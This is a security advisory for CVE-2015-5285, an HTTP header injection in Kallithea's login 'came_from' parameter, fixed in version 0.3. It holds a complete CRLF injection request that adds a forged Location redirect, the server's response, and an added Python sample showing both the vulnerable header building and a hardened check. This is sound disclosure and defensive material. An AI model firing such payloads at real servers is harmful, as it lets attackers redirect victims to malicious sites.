Kallithea Security Notice CVE-2015-5285

HTTP header injection

Synopsis

A vulnerability has been found in Kallithea, allowing attackers to inject arbitrary headers into the server response for certain URLs.

Description

HTTP header injection was possible in login-related code of Kallithea, allowing attackers to inject arbitrary headers into the server responses.

The vulnerability affects the came_from GET parameter.

Example of a malicious request:

GET /_admin/login?came_from=1%0d%0aX-Forwarded-Host%3a%20http://zeroscience.mk%01%02%0d%0aLocation%3a%20http://zeroscience.mk HTTP/1.1
Host: 192.168.0.28:8080
Content-Length: 0
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://192.168.0.28:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.0.28:8080/_admin/login?came_from=%2F
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: kallithea=3090b35b3e37ba350d71b62c240c50bf87932f0d7e6b1a600cba4e0e890b7e29e253b438

Corresponding response:

HTTP/1.1 302 Found
Cache-Control: no-cache
Content-Length: 411
Content-Type: text/html; charset=UTF-8
Date: Mon, 21 Sep 2015 13:58:05 GMT
Location: http://192.168.0.28:8080/_admin/d47b5
X-Forwarded-Host: http://zeroscience.mk
Location: http://zeroscience.mk
Pragma: no-cache
Server: waitress

<html>
 <head>
  <title>302 Found</title>
 </head>
 <body>
  <h1>302 Found</h1>
  The resource was found at <a href="http://192.168.0.28:8080/_admin/1
X-Forwarded-Host: http://zeroscience.mk
Location: http://zeroscience.mk ">http://192.168.0.28:8080/_admin/1
X-Forwarded-Host: http://zeroscience.mk
Location: http://zeroscience.mk </a>;
you should be redirected automatically.


 </body>
</html>

Impact

The bug allows an attacker to override important response headers, possibly redirecting users to a malicious website or making other middleware misbehave when it trusts the response headers.
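As an added illustration, not Kallithea's own code, the hypothetical Python below reproduces the unsafe pattern the advisory describes (the decoded came_from value concatenated straight into the Location header) next to a validation routine a maintainer could apply before redirecting; the base URL, the function names and the sample value decoded from the request above are assumptions of this example.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample: the came_from value from the advisory's request line, still URL-encoded.
MALICIOUS_CAME_FROM = (
    "1%0d%0aX-Forwarded-Host%3a%20http://zeroscience.mk%01%02%0d%0a"
    "Location%3a%20http://zeroscience.mk"
)
BASE_URL = "http://192.168.0.28:8080/_admin/"  # assumed prefix, as seen in the response


def build_redirect_vulnerable(came_from: str) -> bytes:
    """Unsafe pattern: the decoded parameter is pasted into the header line.
    A %0d%0a in it ends the Location header and starts new ones."""
    target = BASE_URL + unquote(came_from)
    return ("HTTP/1.1 302 Found\r\nLocation: " + target + "\r\n\r\n").encode("latin-1")


def safe_came_from(came_from: str, default: str = "/") -> str:
    """Hardened replacement (hypothetical): only a plain same-site path is
    accepted as a redirect target; anything else falls back to `default`."""
    target = unquote(came_from)
    # Any ASCII control character (CR, LF, NUL, ...) can never belong in a path.
    if re.search(r"[\x00-\x1f\x7f]", target):
        return default
    parts = urlsplit(target)
    # Absolute URLs, scheme-relative '//host' forms and backslashes (which
    # browsers treat like slashes) would turn the redirect into an open one.
    if parts.scheme or parts.netloc or "\\" in target:
        return default
    if not target.startswith("/") or target.startswith("//"):
        return default
    return target


def parse_headers(raw: bytes) -> list:
    """Split a raw response into its header lines, to show how many the server sent."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    return [line for line in head.split(b"\r\n")[1:] if line]
```

With the malicious value the vulnerable builder emits three header lines instead of one, while safe_came_from discards it and returns the default path.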

Resolution

The Kallithea project has fixed this issue in the stable branch. Users are advised to upgrade to the latest 0.3 release.

Affected versions

The issue is present in Kallithea versions before 0.3.

Acknowledgments

Thanks to Gjoko Krstic of Zero Science Lab for reporting this issue.

References

  1. CVE-2015-5285 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5285

  2. Kallithea: Security Notice CVE-2015-5285 https://kallithea-scm.org/security/cve-2015-5285.html

  3. Mercurial changeset fixing the issue https://kallithea-scm.org/repos/kallithea/changeset/38d1c99cd0005c1df5a37692615356c918dbe068

  4. Zero Science Lab http://www.zeroscience.mk/en/